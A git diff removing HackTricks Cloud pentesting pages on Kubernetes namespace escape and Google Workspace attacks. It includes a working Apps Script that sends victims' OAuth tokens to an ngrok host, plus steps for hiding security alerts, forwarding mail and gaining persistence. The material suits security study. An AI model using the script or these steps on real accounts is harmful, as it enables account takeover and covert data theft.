-{% endhint %} - -In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**. - -Here are some techniques you can try to escape to a different namespace: - -### Abuse K8s privileges - -Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens. - -For more info about which privileges you can abuse read: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Escape to the node - -If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens: - -* Check for **SAs tokens mounted in other docker containers** running in the node -* Check for new **kubeconfig files in the node with extra permissions** given to the node -* If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet) - -All these techniques are explained in: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/openshift-pentesting/README.md b/pentesting-cloud/openshift-pentesting/README.md deleted file mode 100644 index 8be91bbad..000000000 --- a/pentesting-cloud/openshift-pentesting/README.md +++ /dev/null @@ -1,19 +0,0 @@ -# OpenShift Pentesting - -## Basic Information - -{% content-ref url="openshift-basic-information.md" %} -[openshift-basic-information.md](openshift-basic-information.md) -{% endcontent-ref %} - -## Security Context Constraints - -{% content-ref url="openshift-scc.md" %} -[openshift-scc.md](openshift-scc.md) -{% endcontent-ref %} - -## Privilege Escalation - -{% content-ref url="openshift-privilege-escalation/" %} -[openshift-privilege-escalation](openshift-privilege-escalation/) -{% endcontent-ref %} diff --git a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md deleted file mode 100644 index 7e5040e3f..000000000 --- a/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md +++ /dev/null @@ -1,19 +0,0 @@ -# OpenShift - Privilege Escalation - -## Missing Service Account - -{% content-ref url="openshift-missing-service-account.md" %} -[openshift-missing-service-account.md](openshift-missing-service-account.md) -{% endcontent-ref %} - -## Tekton - -{% content-ref url="openshift-tekton.md" %} -[openshift-tekton.md](openshift-tekton.md) -{% endcontent-ref %} - -## SCC Bypass - -{% content-ref url="openshift-scc-bypass.md" %} -[openshift-scc-bypass.md](openshift-scc-bypass.md) -{% endcontent-ref %} diff --git a/pentesting-cloud/workspace-security/README.md b/pentesting-cloud/workspace-security/README.md deleted file mode 100644 index f974d179b..000000000 --- a/pentesting-cloud/workspace-security/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# GWS - Workspace Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Entry Points - -### Google Platforms and OAuth Apps Phishing - -Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in: - -{% content-ref url="gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](gws-google-platforms-phishing/) -{% endcontent-ref %} - -### Password Spraying - -In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address. - -## Post-Exploitation - -If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges: - -{% content-ref url="gws-post-exploitation.md" %} -[gws-post-exploitation.md](gws-post-exploitation.md) -{% endcontent-ref %} - -### GWS <-->GCP Pivoting - -Read more about the different techniques to pivot between GWS and GCP in: - -{% content-ref url="../gcp-security/gcp-to-workspace-pivoting/" %} -[gcp-to-workspace-pivoting](../gcp-security/gcp-to-workspace-pivoting/) -{% endcontent-ref %} - -## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID) - -* **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC. -* **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time. -* **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). - -{% content-ref url="gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/" %} -[gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid](gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/) -{% endcontent-ref %} - -## Persistence - -If you have compromised some credentials or the session of the user check these options to maintain persistence over it: - -{% content-ref url="gws-persistence.md" %} -[gws-persistence.md](gws-persistence.md) -{% endcontent-ref %} - -## Account Compromised Recovery - -* Log out of all sessions -* Change user password -* Generate new 2FA backup codes -* Remove App passwords -* Remove OAuth apps -* Remove 2FA devices -* Remove email forwarders -* Remove emails filters -* Remove recovery email/phones -* Removed malicious synced smartphones -* Remove bad Android Apps -* Remove bad account delegations - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md deleted file mode 100644 index 09b6ffa5b..000000000 --- a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md +++ /dev/null @@ -1,273 +0,0 @@ -# GWS - App Scripts - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## App Scripts - -App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\ -They can also be set to be **executed every certain time** by the owner of the App Script (Persistence). - -### Create App Script - -There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**: - -
- -Create a container-bound project from Google Docs, Sheets, or Slides - -1. Open a Docs document, a Sheets spreadsheet, or Slides presentation. -2. Click **Extensions** > **Google Apps Script**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project - -To create a standalone project from Apps Script: - -1. Go to [`script.google.com`](https://script.google.com/). -2. Click add **New Project**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project from Google Drive - -1. Open [Google Drive](https://drive.google.com/). -2. Click **New** > **More** > **Google Apps Script**. - -
- -
- -Create a container-bound project from Google Forms - -1. Open a form in Google Forms. -2. Click More more\_vert > **Script editor**. -3. In the script editor, click **Untitled project**. -4. Give your project a name and click **Rename**. - -
- -
- -Create a standalone project using the clasp command line tool - -`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal. - -See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details. - -
- -## App Script Scenario - -### Create Google Sheet with App Script - -Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**. - -### Leak token - -In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**: - -* **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions) -* **Gmail**: To access gmail data -* **Drive**: To access drive data -* **Google Sheets API**: So it works with the trigger - -To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.** - -{% code overflow="wrap" %} -```javascript -function getToken() { - var userEmail = Session.getActiveUser().getEmail(); - var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1); - var oauthToken = ScriptApp.getOAuthToken(); - var identityToken = ScriptApp.getIdentityToken(); - - // Data json - data = { - "oauthToken": oauthToken, - "identityToken": identityToken, - "email": userEmail, - "domain": domain - } - - // Send data - makePostRequest(data); - - // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions - - // To ask for AdminDirectory permissions - var pageToken = ""; - page = AdminDirectory.Users.list({ - domain: domain, // Use the extracted domain - orderBy: 'givenName', - maxResults: 100, - pageToken: pageToken - }); - - // To ask for gmail permissions - var threads = GmailApp.getInboxThreads(0, 10); - - // To ask for drive permissions - var files = DriveApp.getFiles(); -} - - -function makePostRequest(data) { - var url = 'http://5.tcp.eu.ngrok.io:12027'; - - var options = { - 'method' : 'post', - 'contentType': 'application/json', - 'payload' : JSON.stringify(data) - }; - - try { - UrlFetchApp.fetch(url, options); - } catch (e) { - Logger.log("Error making POST request: " + e.toString()); - } -} -``` -{% endcode %} - -To capture the request you can just run: - -```bash -ngrok tcp 4444 -nc -lv 4444 #macOS -``` - -Permissions requested to execute the App Script: - -
- -{% hint style="warning" %} -As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**. -{% endhint %} - -### Create Trigger - -Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save. - -Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something. - -### Sharing - -In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**. - -{% hint style="success" %} -The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users. -{% endhint %} - -### Abusing Shared With Me documents - -{% hint style="danger" %} -If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created). - -A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?) -{% endhint %} - -{% hint style="success" %} -If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created. -{% endhint %} - -### Copying instead of sharing - -When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\ -If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:** - -
- -If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**. - -### Sharing as Web Application - -Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear: - -
- -Followed by the **typical OAuth prompt asking** for the needed permissions. - -### Testing - -You can test a gathered token to list emails with: - -{% code overflow="wrap" %} -```bash -curl -X GET "https://www.googleapis.com/gmail/v1/users//messages" \ --H "Authorization: Bearer " -``` -{% endcode %} - -List calendar of the user: - -```bash -curl -H "Authorization: Bearer $OAUTH_TOKEN" \ - -H "Accept: application/json" \ - "https://www.googleapis.com/calendar/v3/users/me/calendarList" -``` - -## App Script as Persistence - -One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.** - -It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**: - -Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you: - -
- -{% hint style="danger" %} -This will create a security alert email and a push message to your mobile alerting about this. -{% endhint %} - -### Shared Document Unverified Prompt Bypass - -Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**. - -{% hint style="warning" %} -This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it. - -This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document. -{% endhint %} - -{% hint style="danger" %} -This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\ -To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags). -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-persistence.md b/pentesting-cloud/workspace-security/gws-persistence.md deleted file mode 100644 index d4b446fd1..000000000 --- a/pentesting-cloud/workspace-security/gws-persistence.md +++ /dev/null @@ -1,210 +0,0 @@ -# GWS - Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -{% hint style="danger" %} -All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account. -{% endhint %} - -## **Persistence in Gmail** - -* You can create **filters to hide** security notifications from Google - * `from: (no-reply@accounts.google.com) "Security Alert"` - * This will prevent security emails to reach the email (but won't prevent push notifications to the mobile) - -
- -Steps to create a gmail filter - -(Instructions from [**here**](https://support.google.com/mail/answer/6579)) - -1. Open [Gmail](https://mail.google.com/). -2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) . -3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**. -4. At the bottom of the search window, click **Create filter**. -5. Choose what you’d like the filter to do. -6. Click **Create filter**. - -Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters) - -
- -
- -* Create **forwarding address to forward sensitive information** (or everything) - You need manual access. - * Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop) - * The receiving address will need to confirm this - * Then, set to forward all the emails while keeping a copy (remember to click on save changes): - -
- -It's also possible create filters and forward only specific emails to the other email address. - -## App passwords - -If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.** - -**Even if you have an open session you will need to know the password of the user to create an app password.** - -{% hint style="info" %} -App passwords can **only be used with accounts that have 2-Step Verification** turned on. -{% endhint %} - -## Change 2-FA and similar - -It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\ -**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).** - -{% hint style="danger" %} -To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here. - -It's also possible to **locate the device.** -{% endhint %} - -**Even if you have an open session you will need to know the password of the user to change these settings.** - -## Persistence via OAuth Apps - -If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\ -It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**. - -Check the following page for more information about OAuth Apps: - -{% content-ref url="gws-google-platforms-phishing/" %} -[gws-google-platforms-phishing](gws-google-platforms-phishing/) -{% endcontent-ref %} - -## Persistence via delegation - -You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled). - -
- -If you are a Workspace admin check this to enable the feature - -(Information [copied form the docs](https://support.google.com/a/answer/7223765)) - -As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can: - -* Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf. -* Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account. - -Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit. - -#### Delegation limits & restrictions - -* **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account. -* With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number. -* Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently. -* A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit. -* Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609). - -#### Step 1: Turn on Gmail delegation for your users - -**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584). - -1. [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076). - - Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com -2. In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**. -3. To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584). -4. Click **Mail delegation**. -5. Check the **Let users delegate access to their mailbox to other users in the domain** box. -6. (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box. -7. Select an option for the default sender information that's included in messages sent by delegates: - * **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate. - * **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included. -8. (Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box. -9. Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings. -10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 3–9. - -Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107) - -#### Step 2: Have users set up delegates for their accounts - -After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user. - -For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350). - -
- -
- -From a regular suer, check here the instructions to try to delegate your access - -(Info copied [**from the docs**](https://support.google.com/mail/answer/138350)) - -You can add up to 10 delegates. - -If you're using Gmail through your work, school, or other organization: - -* You can add up to 1000 delegates within your organization. -* With typical use, 40 delegates can access a Gmail account at the same time. -* If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time. - -1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app. -2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**. -3. Click the **Accounts and Import** or **Accounts** tab. -4. In the "Grant access to your account" section, click **Add another account**. If you’re using Gmail through your work or school, your organization may restrict email delegation. If you don’t see this setting, contact your admin. - * If you don't see Grant access to your account, then it's restricted. -5. Enter the email address of the person you want to add. If you’re using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\ - \ - **Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in. - - * [Learn how an Admin can create a user](https://support.google.com/a/answer/33310). - * [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319). - - 6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**. - - The person you added will get an email asking them to confirm. The invitation expires after a week. - - If you added a group, all group members will become delegates without having to confirm. - - Note: It may take up to 24 hours for the delegation to start taking effect. - -
- -## Persistence via Android App - -If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone. - -## **Persistence via** App Scripts - -You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check: - -{% content-ref url="gws-google-platforms-phishing/gws-app-scripts.md" %} -[gws-app-scripts.md](gws-google-platforms-phishing/gws-app-scripts.md) -{% endcontent-ref %} - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md deleted file mode 100644 index 30bbf4d6a..000000000 --- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md +++ /dev/null @@ -1,87 +0,0 @@ -# GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## GCPW - Google Credential Provider for Windows - -This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**. - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gcpw-google-credential-provider-for-windows.md" %} -[gcpw-google-credential-provider-for-windows.md](gcpw-google-credential-provider-for-windows.md) -{% endcontent-ref %} - -## GCSD - Google Cloud Directory Sync - -This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing). - -It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time. - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gcds-google-cloud-directory-sync.md" %} -[gcds-google-cloud-directory-sync.md](gcds-google-cloud-directory-sync.md) -{% endcontent-ref %} - -## 